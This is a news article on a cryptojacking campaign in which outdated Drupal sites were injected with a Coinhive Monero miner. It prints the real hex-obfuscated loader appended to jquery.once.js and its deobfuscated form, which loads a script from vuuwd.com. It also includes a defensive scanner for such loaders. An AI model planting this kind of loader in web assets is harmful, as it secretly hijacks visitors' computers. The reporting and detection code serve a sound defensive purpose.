Outdated website software lets hackers mine cryptocurrencies at your expense

An outdated version of Drupal, a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Mursch outlined how the hack worked and even showed how much processing power browsers began taking up when they pointed at the hacked sites.

#Coinhive found on the website of the San Diego Zoo (@sandiegozoo) in the latest high-profile case of #cryptojacking. pic.twitter.com/B3rd2Q5uVA

— Bad Packets Report (@bad_packets) May 4, 2018

The hack uses a form of code injection that forces the browser to run Coinhive, a small bit of JavaScript-based mining software. The code mines Monero, the ostensibly anonymous cryptocurrency.

The hacked sites all pointed to a URL – “http://vuuwd.com/t.js” – where Coinhive lived. The browser ran the software and began using up CPU power to mine the coin.

Mursch performed a comprehensive search for potentially affected sites and narrowed things down to about 350 sites, all of them running older versions of Drupal.

“The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon,” he wrote.

The code appears at the end of jquery.once.js and is still visible on this site. It consists of a single line:

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

Which, deobfuscated, translates to:

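'use strict';
// Grab the page's <head> element.
var dZ1 = window["document"]["getElementsByTagName"]("head")[0];
// Create a new <script> element.
var ZBRnO2 = window["document"]["createElement"]("script");
/** @type {string} */
ZBRnO2["type"] = "text/javascript";
/** @type {string} */
ZBRnO2["id"] = "m_g_a";
/** @type {string} */
ZBRnO2["src"] = "https://vuuwd.com/t.js";
// Attach the script to <head>, which makes the browser fetch and run it.
dZ1["appendChild"](ZBRnO2);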
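For site owners auditing their own JavaScript assets for a line like this, the hex escapes can be decoded as plain text, without running anything, and the result checked for a hidden script loader. The following is an added example, not code from Mursch's report; the sample strings, the placeholder hosts and the `allowedHosts` parameter are constructed assumptions.

```javascript
// Decode \xNN escapes as text only; nothing from the scanned file is executed.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Collect the contents of single- and double-quoted string literals.
function stringLiterals(src) {
  const re = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;
  const out = [];
  for (const m of src.matchAll(re)) out.push(m[1] !== undefined ? m[1] : m[2]);
  return out;
}

// Hostname of a URL-like literal, or null if it does not parse.
const hostOf = (u) => {
  try { return new URL(u, 'https://base.invalid').hostname; } catch { return null; }
};

// Report whether a script hides DOM calls behind hex escapes and uses them
// to load a script from a host outside allowedHosts (hypothetical parameter).
function analyze(src, allowedHosts = []) {
  const decoded = decodeHexEscapes(src);
  const literals = stringLiterals(decoded);
  const api = /createElement/;
  const hiddenApi = !api.test(src) && api.test(decoded); // only visible after decoding
  const loadsScript = api.test(decoded) && /appendChild|insertBefore/.test(decoded)
    && literals.includes('script');
  const hosts = literals.filter((s) => /^(https?:)?\/\//i.test(s)).map(hostOf);
  const unexpectedHosts = hosts.filter((h) => h !== null && !allowedHosts.includes(h));
  return { hiddenApi, loadsScript, unexpectedHosts,
    suspicious: hiddenApi && loadsScript && unexpectedHosts.length > 0 };
}

// Constructed samples: same shape as the injected line, with placeholder hosts.
const hex = (s) => [...s].map((c) => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const INJECTED_SAMPLE =
  `var e=window["${hex('document')}"]["${hex('createElement')}"]('${hex('script')}');` +
  `e["${hex('src')}"]='${hex('https://miner.example.invalid/t.js')}';` +
  `window["${hex('document')}"]["${hex('getElementsByTagName')}"]('${hex('head')}')[0]` +
  `["${hex('appendChild')}"](e);`;
const BENIGN_SAMPLE =
  "var s=document.createElement('script');s.src='https://cdn.example.invalid/lib.js';" +
  "document.head.appendChild(s);";

console.log(analyze(INJECTED_SAMPLE, ['cdn.example.invalid']));
console.log(analyze(BENIGN_SAMPLE, ['cdn.example.invalid']));
```

The check only covers `\xNN` string escapes, the encoding used in the line above; other obfuscation styles need their own decoders.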

The domain it calls, vuuwd.com, is down.

BadPackets has a full list of the hacked websites and, as evidenced by the lines above, it doesn’t seem that many folks are rushing to fix their sites. A canonical list appears here.

“Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency,” wrote Mursch.
